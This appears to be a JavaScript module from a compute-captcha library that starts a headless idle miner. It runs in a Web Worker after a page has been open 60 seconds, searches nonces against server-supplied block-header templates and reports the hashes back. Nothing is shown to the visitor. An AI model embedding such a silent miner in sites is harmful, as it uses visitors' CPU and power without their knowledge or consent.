// Headless idle miner — no UI, no token, no finalize.
// Activated via <script data-mine-after="60000" data-sitekey="pk_idle_..."> tag.
import { ProtocolClient } from "../protocol/client.js";
import { spawnMinerWorker } from "./spawn.js";
import { defaultApiBase } from "../api_base.js";

export function startIdleMiner({ sitekey, api }) {
  if (!sitekey) {
    console.warn("[compute-captcha] idle miner: missing data-sitekey");
    return null;
  }
  let worker = null;
  let templateId = null;

  const client = new ProtocolClient({
    apiBase: api || defaultApiBase(),
    siteKey: sitekey,
    mode: "idle",
    onSession: (m) => {
      templateId = m.template_id || "init";
      worker = spawnWorker(client);
      if (worker) {
        worker.postMessage({
          type: "init",
          skeleton: m.header_skeleton,
          template_id: templateId,
          start_nonce: 0,
        });
      }
    },
    onNewTemplate: (m) => {
      templateId = m.template_id || "new";
      if (worker) {
        worker.postMessage({
          type: "reset",
          skeleton: m.header_skeleton,
          template_id: templateId,
          start_nonce: 0,
        });
      }
    },
    onFail: (m) => {
      console.warn("[compute-captcha] idle miner failed:", m.reason);
      stopWorker();
    },
    onError: (e) => console.warn("[compute-captcha] idle ws error", e),
  });

  function spawnWorker(c) {
    if (typeof Worker !== "function") {
      console.warn("[compute-captcha] no Web Worker support; idle miner disabled");
      return null;
    }
    const w = spawnMinerWorker();
    w.onmessage = (e) => {
      const m = e.data;
      if (m.type === "improvement") {
        c.sendImprovement(m.nonce, m.hash, m.template_id);
      }
    };
    return w;
  }

  function stopWorker() {
    if (worker) {
      worker.postMessage({ type: "stop" });
      worker.terminate();
      worker = null;
    }
  }

  // Cleanup on page unload
  if (typeof window !== "undefined") {
    window.addEventListener("beforeunload", () => {
      stopWorker();
      client.close();
    });
  }

  client.connect();
  return { stop: () => { stopWorker(); client.close(); } };
}
